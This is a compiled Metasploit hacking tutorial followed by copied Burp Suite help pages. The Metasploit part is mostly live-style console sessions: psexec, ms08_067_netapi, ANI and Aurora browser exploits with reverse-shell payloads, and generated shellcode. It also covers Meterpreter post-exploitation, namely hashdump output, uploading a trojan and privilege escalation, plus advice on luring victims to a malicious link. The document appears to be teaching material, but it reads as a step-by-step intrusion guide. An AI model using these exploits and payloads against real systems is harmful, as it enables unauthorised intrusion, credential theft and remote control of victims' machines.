msf exploit(psexec) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad3298f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1073)
Passive Exploits
Passive exploits wait for incoming hosts and exploit them as they connect.
Passive exploits almost always focus on clients such as web browsers, FTP
clients, etc.
They can also be used in conjunction with email exploits, waiting for
connections.
Passive exploits report shells as they happen can be enumerated by passing
'-l' to the sessions command. Passing '-i' will interact with a shell.
msf exploit(ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- -----1 Meterpreter 192.168.1.101:52647 -> 192.168.1.104:4444
msf exploit(ani_loadimage_chunksize) > sessions -i 1
meterpreter >
Passive Exploit Example

The following output shows the setup to exploit the animated cursor vulnerability.
The exploit does not fire until a victim browses to our malicious website.
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.104:1077...
[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to
192.168.1.104:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
C:\Documents and Settings\victim\Desktop>
Using Exploits
Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to
msfconsole.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > help
...snip...
Exploit Commands
================
Command Description
------- ----------check Check to see if a target is vulnerable
exploit Launch an exploit attempt
rcheck Reloads the module and checks if the target is vulnerable
rexploit Reloads the module and launches an exploit attempt
msf exploit(ms08_067_netapi) >
Using an exploit also adds more options to the 'show' command.

msf exploit(ms03_026_dcom) > show targets
Exploit targets:
Id Name
-- ---0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > show payloads
Compatible payloads
===================
Name Description
---- ----------generic/debug_trap Generic x86 Debug Trap
...snip...
msf exploit(ms03_026_dcom) > show options
Module options:
RPORT 135 yes The target port
Exploit target:
Id Name
-- ---0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > show advanced
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address
Name : CPORT
Current Setting:
Description : The local client port
...snip...
msf exploit(ms03_026_dcom) > show evasion
Module evasion options:
Name : DCERPC::fake_bind_multi
Current Setting: true
Description : Use multi-context bind calls
...snip
Metasploit Payloads
There are three different types of payload module types in Metasploit: Singles,
Stagers, and Stages. These different types allow for a great deal of versatility and
can be useful across numerous types of scenarios. Whether or not a payload is
staged, is represented by '/' in the payload name. For example,
"windows/shell_bind_tcp" is a single payload, with no stage whereas
"windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).
Singles
Singles are payloads that are self-contained and completely standalone. A Single
payload can be something as simple as adding a user to the target system or
running calc.exe.
Stagers
Stagers setup a network connection between the attacker and victim and are
designed to be small and reliable. It is difficult to always do both of these well so the
result is multiple similar stagers. Metasploit will use the best one when it can and fall
back to a less-preferred one when necessary.
Windows NX vs NO-NX Stagers
Reliability issue for NX CPUs and DEP
NX stagers are bigger (VirtualAlloc)
Default is now NX + Win7 compatible
Stages
Stages are payload components that are downloaded by Stagers modules. The
various payload stages provide advanced features with no size limits such as
Meterpreter, VNC Injection, and the iPhone 'ipwn' Shell.
Payload stages automatically use 'middle stagers'
A single recv() fails with large payloads
The stager receives the middle stager
The middle stager then performs a full download
Also better for RWX
Payload Types
Metasploit contains many different types of payloads, each serving a unique role
within the framework. Let's take a brief look at the various types of payloads
available and get an idea of when each type should be used.
Inline (Non Staged)

A single payload containing the exploit and full shell code for the selected
task. Inline payloads are by design more stable than their counterparts
because they contain everything all in one. However some exploits wont
support the resulting size of these payloads.
Staged
Stager payloads work in conjunction with stage payloads in order to perform a
specific task. A stager establishes a communication channel between the
attacker and the victim and reads in a stage payload to execute on the remote
host.
Meterpreter
Meterpreter, the short form of Meta-Interpreter is an advanced, multi-faceted
payload that operates via dll injection. The Meterpreter resides completely in
the memory of the remote host and leaves no traces on the hard drive,
making it very difficult to detect with conventional forensic techniques. Scripts
and plugins can be loaded and unloaded dynamically as required and
Meterpreter development is very strong and constantly evolving.
PassiveX
PassiveX is a payload that can help in circumventing restrictive outbound
firewalls. It does this by using an ActiveX control to create a hidden instance
of Internet Explorer. Using the new ActiveX control, it communicates with the
attacker via HTTP requests and responses.
NoNX
The NX (No eXecute) bit is a feature built into some CPUs to prevent code
from executing in certain areas of memory. In Windows, NX is implemented
as Data Execution Prevention (DEP). The Metasploit NoNX payloads are
designed to circumvent DEP.
Ord
Ordinal payloads are Windows stager based payloads that have distinct
advantages and disadvantages. The advantages being it works on every
flavor and language of Windows dating back to Windows 9x without the
explicit definition of a return address. They are also extremely tiny. However
two very specific disadvantages make them not the default choice. The first
being that it relies on the fact that ws2_32.dll is loaded in the process being
exploited before exploitation. The second being that it's a bit less stable than
the other stagers.
IPv6
The Metasploit IPv6 payloads, as the name indicates, are built to function
over IPv6 networks.
Reflective DLL injection
Reflective DLL Injection is a technique whereby a stage payload is injected
into a compromised host process running in memory, never touching the host
hard drive. The VNC and Meterpreter payloads both make use of reflective
DLL injection. You can read more about this from Stephen Fewer, the creator
of the reflective DLL injection method.
Metasploit Generating Payloads

During exploit development, you will most certainly need to generate shellcode to
use in your exploit. In Metasploit, payloads can be generated from within the
msfconsole. When you 'use' a certain payload, Metasploit adds the 'generate'
command.
msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > help
...snip...
Payload Commands
================
Command Description
------- ----------generate Generates a payload
msf payload(bind_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-b The list of characters to avoid: '\x00\xff'
-e The name of the encoder module to use.
-f The output file name (otherwise stdout)
-h Help banner.
-o A comma separated list of options in VAR=VAL format.
-s NOP sled length.
-t The output type: ruby, perl, c, or raw.
To generate shellcode without any options, simply execute the 'generate' command.
msf payload(bind_tcp) > generate
# windows/shell/bind_tcp - 298 bytes (stage 1)
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444, RHOST=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" +
"\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" +
"\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" +
"\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" +
"\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" +
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" +
"\xf6\x75\xec\xc3"
...snip...
About the Metasploit Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory
DLL injection stagers and is extended over the network at runtime. It communicates
over the stager socket and provides a comprehensive client-side Ruby API. It
features command history, tab completion, channels, and more. Metepreter was
originally written by skape for Metasploit 2.x, common extensions were merged for
3.x and is currently undergoing an overhaul for Metasploit 3.3. The server portion is
implemented in plain C and is now compiled with MSVC, making it somewhat
portable. The client can be written in any language but Metasploit has a full-featured
Ruby client API.
How Meterpreter Works
The target executes the initial stager. This is usually one of bind, reverse,
findtag, passivex, etc.
The stager loads the DLL prefixed with Reflective. The Reflective stub
handles the loading/injection of the DLL.
The Metepreter core initializes, establishes a TLS/1.0 link over the socket and
sends a GET. Metasploit receives this GET and configures the client.
Lastly, Meterpreter loads extensions. It will always load stdapi and will load
priv if the module gives administrative rights. All of these extensions are
loaded over TLS/1.0 using a TLV protocol.
Meterpreter Design Goals
"Stealthy"
Meterpreter resides entirely in memory and writes nothing to disk.
No new processes are created as Meterpreter injects itself into the
compromised process and can migrate to other running processes easily.
By default, Meterpreter uses encrypted communications.
All of these provide limited forensic evidence and impact on the victim
machine.
"Powerful"
Meterpreter utilizes a channelized communication system.
The TLV protocol has few limitations.
"Extensible"
Features can be augmented at runtime and are loaded over the network.
New features can be added to Meterpreter without having to rebuild it.
Adding Runtime Features

New features are added to Meterpreter by loading extensions.
The client uploads the DLL over the socket.
The server running on the victim loads the DLL in-memory and initializes it.
The new extension registers itself with the server.
The client on the attackers machine loads the local extension API and can
now call the extensions functions.
This entire process is seamless and takes approximately 1 second to complete.
Metasploit Meterpreter Basics

Since the Meterpreter provides a whole new environment, we will cover some of the
basic Meterpreter commands to get you started and help you get familiar with this
most powerful tool. Throughout this course, almost every available Meterpreter
command is covered. For those that aren't covered, experimentation is the key to
successful learning. help The 'help' command, as may be expected, displays the
Meterpreter help menu.
meterpreter > help
Core Commands
=============
Command Description
------- ----------? Help menu
background Backgrounds the current session
channel Displays information about active channels
...snip...
background
The 'background' command will send the current Meterpreter session
to the background and return you to the msf prompt. To get back to your Meterpreter
session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
meterpreter >
ps
The 'ps' command displays a list of running processes on the target.

meterpreter > ps
Process list
============
PID Name Path
--- ---- ---132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
288 snmp.exe C:\WINDOWS\System32\snmp.exe
...snip...
migrate
Using the 'migrate' post module, you can migrate to another process on the
victim.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >
ls
As in Linux, the 'ls' command will list the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ---40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data
...snip...
download
The 'download' command downloads a file from the remote machine.
Note the use of the double-slashes when giving the Windows path.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >
'upload
As with the 'download' command, you need to use double-slashes with the
'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >
ipconfig
The 'ipconfig' command displays the network interfaces and addresses on
the remote machine.
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0
meterpreter >
getuid
Running 'getuid' will display the user that the Meterpreter server is running as
on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
execute
The 'execute' command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
shell
The 'shell' command will present you with a standard shell on the target
system.
meterpreter > shell
Channel 2 created.
idletime
Running 'idletime' will display the number of seconds that the user at the
remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >
hashdump
The 'hashdump' post module will dump the contents of the SAM
database.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1
225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3c
f52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c
089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01
502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de
7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb
3cf52d:::
meterpreter >
So, If have gone through the the commands and usage its that u
have got something about the metasploit framework.
You must be eager to exploit but its worth mentioning auxiliaries.
When most people think of Metasploit,
exploits come
to mind. Exploits are cool, exploits get you
shell, and
exploits get all the attention. But sometimes
you need
something more than that. By definition, a
Metasploit
module that is not an exploit is an auxiliary
module,
which leaves a lot to the imagination.
In addition to providing valuable reconnaissance tools such as
portscanners and service fingerprinters, auxiliary modules such as
ssh_login can take a known list of usernames and passwords and
then attempt to log in via brute force across an entire target
network. Also included in the auxiliary modules are various
protocol fuzzers such as
ftp_pre_post,http_get_uri_long,smtp_fuzzer,ssh_version_corrupt,
and more. You can launch these fuzzers at a target service in
hopes of finding your own vulnerabilities to exploit.
Just because auxiliary modules dont have a payload, dont think

you wont use them. But before we dive into their myriad uses,
heres an overview to help you see what we are dealing with.
There are many auxiliary but we will try to help you understand
some basic, you are free to experiment with the msfconsole
yourself.Because the help is comprehensive.
Auxiliary modules are exciting because they can be used in so

many ways for so many things. If you cant find the perfect
auxiliary module, its easy to modify one to suit your specific
needs.
Consider a common example. Say you are conducting a remote
penetration test, and upon scanning the network, you identify a
number of web server and not much else. Your attack surface is
limited at this point, and you have to work with what is available
to you. Your auxiliary scanner/http modules will now prove
extremely helpful as you look for low-hanging fruit against which
you can launch an exploit. To search for all available HTTP
scanners, run search scanner/http as shown here.
You can see immediately that there are modules that you can use
for subsequent exploration. Older versions of Microsoft IIS had a
vulnerability in their WebDAV implementations that allowed for
remote exploitation, so you could first run a scan against your
targets in hopes of finding a server with WebDAV enabled, as
follows.
See the ip address marked 2 is vulnerable.So it can be

hacked.Cool isnt it.So I think you have some idea about the
auxiliary modules.
__________________________________________________________________
_It seems like you have some idea about how to use the exploits
and auxiliaries.Lets have a Case study of attacking a System.
The materials have been copied from metasploit unleased and
metasploit a penetration testers guide.
This is a case study which deals about hacking a Computer With

just the IP Address.
First open netdiscover to discover the attacking machine on your network. You can do this by just
running that command alone into terminal or get more detailed and run it like this
netdiscover -i eth0 -r 192.168.0.1/24
with the output something like mine
Now open up a Metasploit console typing in terminal

msfconsole
Now we want to do a search for all exploits that have to do woth netapi so we run that serch with the
command below
search netapi
You'll want to run the exploit I highlited in this screenshot
exploit/windows/smb/ms08_067_netapi
Now type
show options to show all of the available options to set for this exploit
show options
Now lets set our Remote Host "Machine we are attacking" ---->Victims PC
set RHOST 192.168.0.101
Now we want to set the payload for the exploit by typing in the command below
set PAYLOAD windows/meterpreter/reverse_tcp
Now we need to set the Local host which would be our machine ---> "The Attackers Machine "you"
set LHOST 192.168.0.100
Last but not least we will type in the command below to begin exploiting the system
exploit
Now you can use the meterpreter.Just look for the reference.
This attack is possible if the firewall is disabled in unpatched XP SP2 System.
Thanks to the guy called n1tr0g3n.
The Microsoft internet Explorer Exploit

In 2010 major companies like Google,Adobe,Symantec,Juniper
Networks and others have been attacked by an exploit called
Aurora.Metasploit framework has an exploit that uses the same
technique of the famous Auroraand takes advantage a memory
corruption flaw in Internet Explorer.
For this example we will test the exploit against a machine
running Windows XP in order to see how it affects the Internet
Explorer 6.So we are opening the metasploit framework and we
are searching for the ms10_002 the Aurora exploit.
Searching for the Aurora and use of the payload
For this attack as you can see and from the image above we have
chosen as a payload the meterpreter reverse TCP.Next it is time to
have a look at the available options of the exploit.
Analyzing the Options of Aurora Exploit
As we can see the default setting for the SRVHOST is 0.0.0.0: If we

choose to leave it like that the web server will bind to all
interfaces.The next option is the SRVPORT which is the port that
the user needs to connect in order to trigger the exploit. By
default the port is 8080 but we will use the port 80 for this
example.We have the option also to set up the server
for SSL connections but here we will not configure it.The next
setting is theURIPATH which is not enabled by default.URIPATH is
the URL that the victim will need to enter to trigger the
vulnerability.We can use a custom URL or we can set this to slash
(/).
For the payload settings we just need to configure the local port
and the listen address.For this scenario we have chosen the port
443 and the IP address 192.168.1.1 which is our local address.The
next image is showing the settings that we have made so far:
Setting the Aurora and the payload
Now that all the settings are correct it is time to use the
command exploit in order to run the exploit.We will notice that it
will start the web server in our local IP address.All we need now is
to send the URL or the URI path if you prefer to our victims and to
wait for someone to connect.For this scenario we have set the URI
path as /so this means it will be only our IP address.
From the moment that someone opens the link the exploit will
start the heap spray.The Internet explorer of the remote target
will not respond for a while and the amount of memory will
increased dramatically causing the system to act slowly.
The next image is showing how the Aurora exploit is opening a
meterpreter session.
Running the Aurora Exploit
Now we have a Meterpreter shell on the remote machine and we

can start the session by using the commandsessions -i 1.However
if the user closes the browser then we will lose our shell.In order
to avoid that we can type the command in our meterpreter
session run migrate and it will automatically migrates with
another process of the system so we will keep our shell.
Starting the session and migration with another process
Additionally we can try to escalate privileges with the

command getsystem and we can see the running processes of the
remote system with the command ps.
Privilege Escalation
Getsystem can be used to get system privilege.
Affected versions
Internet Explorer 6
Microsoft claims that it is also possible to affect Internet Explorer
7 and 8 but nobody so far have seen this exploit to work on these
versions.
Conclusion
This was a client-side attack with the use of the famous exploit
Aurora.Microsoft claims that affects and Internet Explorer 7 and 8
but from our testings against these versions we couldnt get a
shell.
The problem with this exploit is that it requires the user
interaction in order to get a shell.The user must open an unknown
link that will come from an unknown user so you need to
workaround a method that will convince your targets.Also if the
user closes the Web browser then the shell is lost.This means that
we have to migrate the existing process to another process very
fast.
I will try to get deep into metasploit and its working in the
advanced sections.
Go to offensive security for metasploit tutorials the idea here was

to present the basic layout.
__________________________________________________________________
_
Chapter 3:Web Security:The Burp Suite

and W3AF
What is Burp Suite?
Burp Suite is an integrated platform for attacking web applications. It contains a variety
of tools with numerous interfaces between them designed to facilitate and speed up the
process of attacking an application. All of the tools share the same robust framework
for handling and displaying HTTP messages, persistence, authentication, proxies,
logging, alerting and extensibility.
Burp Suite allows the individual tools to work together in highly effective ways, for
instance:
A central site map is used to aggregate information gathered about target

applications, and a centrally-defined target scope can be used to control the behaviour
of individual tools.
Any HTTP request and response processed by any of the Burp tools can be
selected for treatment by other tools. For example, a request from the Proxy history
can be sent to Intruder to form the basis of a custom automated attack, to Repeater for
a manual attack, to the Scanner for vulnerability analysis, or to Spider for automated
content discovery.
Applications can be "passively" spidered without generating huge numbers of

automated requests. All requests and responses passing through Burp Proxy are parsed
for links and forms, and the site map is updated accordingly, allowing you to map
sensitive applications in a non-intrusive manner, with full control over every request
that is made.
Requests passing through the Proxy can be automatically scanned for security
vulnerabilities while you are browsing (based on the defined target scope).
The IBurpExtender interface can be used to extend the functionality of Burp

Suite and individual tools. Data processed by one tool can be used in arbitrary ways to
affect the behaviour and results of other tools.
Burp Suite tools

Burp Suite contains the following tools:
Proxy - an intercepting HTTP/S proxy server which operates as a man-in-themiddle between the end browser and the target web application, allowing you to
intercept, inspect and modify the raw traffic passing in both directions.
Spider - an intelligent application-aware web spider which allows complete

enumeration of an application's content and functionality.
Scanner [Pro version only] - an advanced tool for performing automated

discovery of security vulnerabilities in web applications.
Intruder - a highly configurable tool for automating customised attacks against

web applications, such as enumerating identifiers, harvesting useful data, and fuzzing
for common vulnerabilities.
Repeater - a tool for manually manipulating and re-issuing individual HTTP

requests, and analysing the application's responses.
Sequencer - a tool for analysing the quality of randomness in an application's

session tokens or other important data items which are intended to be unpredictable.
Decoder - a tool for performing manual or intelligent decoding and encoding of

application data.
Comparer - a utility for performing a visual "diff" between any two items of
data, normally pairs of related requests and responses.
Use the above links to read the detailed help specific to each of the individual Burp
Suite tools. The remainder of this help describes some typical usage scenarios for Burp
Suite and the shared functionality and configuration options that affect the behaviour of
all of the Burp tools.
Using Burp Suite

When Burp Suite is launched, Burp Proxy is started by default on port 8080 of the local
loopback interface. By setting a web browser to use this as its proxy server, all web
traffic can be intercepted, inspected and modified. By default, requests for non-media
resources are intercepted and displayed (this default behaviour can be modified using
options within Burp Proxy). All web traffic passing through Burp Proxy is by default
analysed and incorporated into the target site map, to build up a picture of the content
and functionality of the applications visited. In Burp Suite Professional, all requests are
by default passively analysed by Burp Scanner to identify a range of security
vulnerabilities.
Before you begin work in earnest, you should ideally define the target scope for your
work. The easiest way to do this is to browse to the application(s) you are targeting,
then locate the relevant hosts or directories within the site map, and use the context
menus to add URL paths to the scope. This central scope configuration can be used to
control the behaviour of the individual Burp tools in various ways.
As you browse the target application, you can intercept requests and responses in the
Proxy for manual editing, or you can turn interception off altogether. With interception
off, a full history is still maintained of each request and response, and content still
accumulates within the site map.
As well as modifying intercepted messages within the Proxy, you can send these to
other Burp tools to perform various actions, for example:
You can send requests to Repeater, to manually fine tune an attack against the
application, and reissue an individual request multiple times.
[Pro version] You can send requests to Scanner, to perform active or passive
vulnerability scanning.
You can send requests to Intruder, to launch a custom automated attack to

identify common vulnerabilities.
If you see a response containing a session token or other identifier that it

intended to be unpredictable, you can pass this to Sequencer to test the randomness of
the token.
Opaque data contained within any request or response can be sent to Decoder to
perform a smart decode and identify any hidden information.
[Pro version] You can use various engagement tools to make your work faster
and more effective.
You can also perform any of the above actions on items in the proxy history, on
individual hosts, directories or files within the target site map, or from anywhere within
any of the tools where requests and responses are displayed.
A central logging function can be used to record all requests and responses made by
individual tools, or the entire suite. The tools can run in a single tabbed window, or be
detached in individual windows. All tool and suite configuration is optionally persistent
across program loads. In Burp Suite Professional, you can save the entire state of the
component tools, to reload at a later stage and resume your work.
Burp menu
This menu contains a number of key functions and configuration options, which are
described below.
Search
[Pro version] Selecting "search" from the Burp menu opens a search dialog, which is
very easy to use. You can specify the following search parameters:
the expression to search for
whether the search is case sensitive
whether the search is simple text or regular expression
whether the search is restricted to in-scope items only
whether the search results should dynamically update as new HTTP messages
are processed
which locations to search within HTTP messages (requests vs. responses,

headers vs. body)
which tools to search in

When you click "go", the search begins, and the key details of each search match are
shown in a sortable table, with a preview pane where you can see the full request and
response, including highlighted matches for your search item. The usual context menus
can be used to initiate attacks against specific items, or send them to other tools for
further analysis:
Note that if you initiate a search via the context menu within the target site map (as
opposed to the Burp menu), then the search will be specific to the selected branch(es)
of the site map.
Saving and restoring state

[Pro version] The help below describes the process of saving and restoring state, and
some common usage scenarios for this functionality.
Saving state
The items that can be saved include:
The target site map, which includes all of the content discovered via the Proxy
and Spider.
The Proxy history.
The issues identified by the Scanner.
The contents and histories of the Repeater tabs.
The configuration of all suite tools.

Selecting "save state" from the Burp menu launches a wizard where you can define
which items you want to save the state and configuration of:
You then choose your output file, and Burp does the rest. You can continue using Burp
while its state is being saved - you may experience some brief delays if you try to
perform an operation on data which Burp is in the process of saving, to prevent any
data corruption.
Obviously, because the save file includes the requests and responses accumulated
within the tools you are saving, this file can grow very large. In practice, a few hours'
testing will typically save or restore in a minute or two. You can make this process
leaner and quicker by deleting unneeded items from the site map and proxy history
before performing a save.
Restoring state
Selecting "restore state" from the Burp menu launches a wizard where you can define
which items you want to restore the state and configuration of. The first step is to select
a file which you previously saved. Burp then analyses this file to identify all of its
contents (remember that each save file can include the state and configuration for any
combinations of tools). For each type of saved state and configuration, Burp lets you
choose whether you want to restore it, and if so whether to add to or replace the tool's
existing state:
Burp then goes to work and restores everything you have selected. You can continue
using Burp while its state is being restored - you may experience some brief delays if
you try to perform an operation on data which Burp is in the process of restoring, to
prevent any data corruption.
Usage scenarios
The ability to save and restore tool state and configuration is of huge benefit to
penetration testers:
You can save your work at the end of each day and seamlessly resume it the
next morning.
You can back up key test information throughout a job, in case of system
crashes.
At the end of an engagement, you can store a full archive of all accumulated
information, enabling you to re-open your work at a later point, to answer a client
question or re-test a fixed issue.
The task of mapping out an application's content can be divided up between

consultants, and the resulting site maps can be merged incrementally into one, for all
consultants to share.
Team leaders can optimise Burp's configuration for a particular engagement,

including fine-grained target scope definition, and pass this configuration straight to
other team members to begin testing.
You can create configuration templates designed for different kinds of task, save
these for future use, and switch between them easily.
Remembering settings
The "remember settings" options determine whether Burp Suite will remember
configuration settings across different loads of the software. You can tell Burp to
remember settings for all tools, or for individually selected tools.
The "restore defaults" options reset all configuration settings within Burp Suite or
individual tools to their default values.
Lean mode
If this option is selected, then the next time Burp Suite starts, it will run in a "lean"
mode in which the only tools available are Burp Proxy, Intruder and Repeater. Running
in this mode creates a smaller impact on system resources and is designed for users
who prefer a more simple lightweight tool.
Target site map

The central site map aggregates all of the information which Burp has gathered about
the application you are attacking. This includes all of the resources which have been
directly requested via the Proxy, any items which have been inferred by analysing the
responses to those requests, and all content discovered using the Spider. When you
begin browsing a typical application, a large amount of content will be mapped out for
you before you even get as far as requesting it, for example:
Items that have been requested are shown in black; those which Burp has inferred but
not yet requested are shown in grey. By default, items that are typically uninteresting
to penetration testers are filtered from the display, but this behaviour can be modified
(described below).
The site map interface works essentially like a graphical email client. A tree view of
hosts and directories is shown on the left. Selecting one or more nodes in the tree view
causes all of the items below these nodes to be shown in table form on the top right.
This table includes the key detail about each item (URL, status code, page title, etc.)
and allows the items to be sorted according to any column (click any column heading to
sort descending, or shift-click to sort ascending). Selecting an item in the table causes
the request and response for that item to show in a preview pane on the bottom right.
This preview pane contains all of the functions familiar from elsewhere in Burp analysis of headers and parameters, text search, media rendering, etc.
As well as displaying all of the information gathered about your target, the site map
enables you to control and initiate specific attacks against it, using the context menus
that appear everywhere. For example, you can select a host or folder within the tree
view, and perform actions on the entire branch of the tree, such as spidering or
scanning:
Similarly, you can select an individual file within the tree or table, and send the
associated request to other tools, such as Intruder or Repeater. If the item has not yet
been requested by your browser, Burp will construct a default request for the item,
based on the URL and any cookies received from the target domain:
[Pro version] You can use the context menu to access various engagement tools, such
as searching for comments and scripts, analysing your target web site, scheduling
tasks, etc.
In the table view, you can annotate individual or multiple items, by adding comments
and highlights:
You can highlight individual items using a drop-down menu on the left-most table
column:
And you can comment individual items in-place by double-clicking and editing the table
cell:
Alternatively, if you want to annotate several items at once, you select the relevant
items and use the context menu to add comments or apply highlights:
When you have annotated interesting requests, you can use column sorting and display
filters to quickly find these items later.
The content displayed within the site map is effectively a view into an underlying
database, and you can configure filters to determine which items of underlying data are
displayed within the map. Some applications contain a large amount of content like
images, CSS, etc., which it is normally helpful to hide from view. At the top of the site
map, there is a filter bar. Clicking on this shows a popup enabling you to configure
exactly what content will be displayed within the map:
